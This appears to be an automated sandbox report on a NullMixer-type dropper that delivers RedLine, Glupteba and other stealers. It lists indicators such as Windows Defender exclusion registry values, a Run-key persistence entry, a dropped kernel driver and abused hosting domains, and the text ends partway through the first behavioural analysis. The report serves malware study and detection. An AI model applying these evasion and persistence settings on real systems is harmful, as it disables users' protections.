Malware Analysis Report

2024-11-13 19:30

Sample ID 241107-f11stavqex
Target 7e03db8c7c0ff1cdc75aa3d996b3d29795f37c61397c36c515dd3f96111b02be
SHA256 7e03db8c7c0ff1cdc75aa3d996b3d29795f37c61397c36c515dd3f96111b02be
Tags
fabookie glupteba metasploit nullmixer privateloader redline socelars media24n user01new aspackv2 backdoor defense_evasion discovery dropper evasion execution infostealer loader persistence privilege_escalation rootkit spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7e03db8c7c0ff1cdc75aa3d996b3d29795f37c61397c36c515dd3f96111b02be

Threat Level: Known bad

The file 7e03db8c7c0ff1cdc75aa3d996b3d29795f37c61397c36c515dd3f96111b02be was found to be: Known bad.

Malicious Activity Summary

fabookie glupteba metasploit nullmixer privateloader redline socelars media24n user01new aspackv2 backdoor defense_evasion discovery dropper evasion execution infostealer loader persistence privilege_escalation rootkit spyware stealer trojan

Socelars

Metasploit family

Glupteba family

MetaSploit

NullMixer

Fabookie family

Detect Fabookie payload

RedLine

Windows security bypass

Glupteba payload

Socelars payload

Glupteba

Nullmixer family

Fabookie

Redline family

Socelars family

Privateloader family

PrivateLoader

RedLine payload

Modifies boot configuration data using bcdedit

Command and Scripting Interpreter: PowerShell

Possible attempt to disable PatchGuard

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Modifies Windows Firewall

Loads dropped DLL

System Binary Proxy Execution: Odbcconf

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

ASPack v2.12-2.42

Windows security modification

Legitimate hosting services abused for malware hosting/C2

Looks up geolocation information via web service

Manipulates WinMon driver.

Manipulates WinMonFS driver.

Checks installed software on the system

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Checks for VirtualBox DLLs, possible anti-VM trick

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Program crash

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Modifies Internet Explorer settings

Suspicious behavior: LoadsDriver

Checks SCSI registry key(s)

Modifies system certificate store

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-07 05:21

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-07 05:21

Reported

2024-11-07 05:23

Platform

win7-20240903-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Glupteba

loader dropper glupteba

Glupteba family

glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Wed1095e8d3cef4ec773.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\ProudDarkness = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed101f2195049.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a80f141fb08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10d7483856.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a0affb29d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10b607271059cb7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10799545d143108.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C6M02.tmp\Wed101f2195049.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RCU3S.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PST3N.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\r3AxJr.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\Build.exe N/A
N/A N/A C:\Program Files (x86)\Gparted\gimagex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed101f2195049.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed101f2195049.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a0affb29d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a0affb29d.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed101f2195049.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10b607271059cb7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10b607271059cb7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C6M02.tmp\Wed101f2195049.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C6M02.tmp\Wed101f2195049.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RCU3S.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RCU3S.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10b607271059cb7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-C6M02.tmp\Wed101f2195049.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RCU3S.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RCU3S.tmp\Wed10fa57e769925f6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A

Reads user/profile data of web browsers

spyware stealer

System Binary Proxy Execution: Odbcconf

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\odbcconf.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\ProudDarkness = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Wed1095e8d3cef4ec773.exe = "0" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\ProudDarkness = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Gparted\__tmp_rar_sfx_access_check_259462750 C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File created C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.exe C:\Program Files (x86)\Gparted\Build.sfx.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Program Files (x86)\Gparted\is-4AT79.tmp C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\is-1LHNO.tmp C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
File created C:\Program Files (x86)\Gparted\is-5LKQ5.tmp C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files (x86)\Gparted\Build.sfx.exe C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
File opened for modification C:\Program Files (x86)\Gparted\gimagex.exe C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20241107052120.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10b607271059cb7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\rss\csrss.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Gparted\gimagex.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed101f2195049.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10520e75c2eb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10a0affb29d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-RCU3S.tmp\Wed10fa57e769925f6.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10fa57e769925f6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1095e8d3cef4ec773.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-3NLKI.tmp\Wed10b607271059cb7.tmp N/A
